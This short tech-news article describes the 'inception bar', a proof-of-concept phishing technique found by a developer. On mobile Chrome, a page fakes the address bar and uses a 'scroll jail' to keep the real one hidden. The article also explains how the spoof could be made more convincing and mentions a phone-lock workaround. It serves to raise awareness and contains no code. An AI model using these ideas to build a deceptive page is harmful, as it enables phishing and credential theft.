Phishing isn’t exactly a new topic in regards to cybersecurity, though new and creative ways of conducting this practice are found often. One such way is the newly discovered and cleverly titled “inception bar”. Recently, a new type of potential phishing attack has been discovered by developer James Fisher.
This phishing attack takes advantage of how the app is displaying the address bar. While you scroll down, in an effort to give more space to the webpage, Chrome likes to hide the address bar, and that’s exactly where this so-called “inception bar” comes in. The attacker can even craft the page to prevent you from seeing the real address bar when you scroll up. Therefore, it is able to prevent the real bar from reappearing when you scroll back up as it should, using what the developer calls “scroll jail” by locking the user into an overflow container, complete with a fake page refresh if they scroll up too far.
The fake bar, in the above instance, is just another static image that spoofs the HSBC address as a proof of concept (and it bugs out on occasion, showing both bars), but nothing is preventing these more maliciously enterprising individuals from creating an interactive, dynamic bar using the same tools. The address bar and menu built into the fake UI could also offer interactivity for a more convincing effect. In which case, even trying to navigate to the proper URL if you pick up on any sketchiness wouldn’t matter, as you’d be using the fake URL bar. What’s even worse is that a truly well-engineered site could pull content a URL you manually enter to better spoof it. In other words, once you’ve loaded a site with the inception bar, there would be little way to know if or when you left — hence the name.
However, you can force the real address bar to show by locking and then unlocking your phone again. It’s not bullet-proof as a result, but many people won’t know to try this and might be fooled as a result.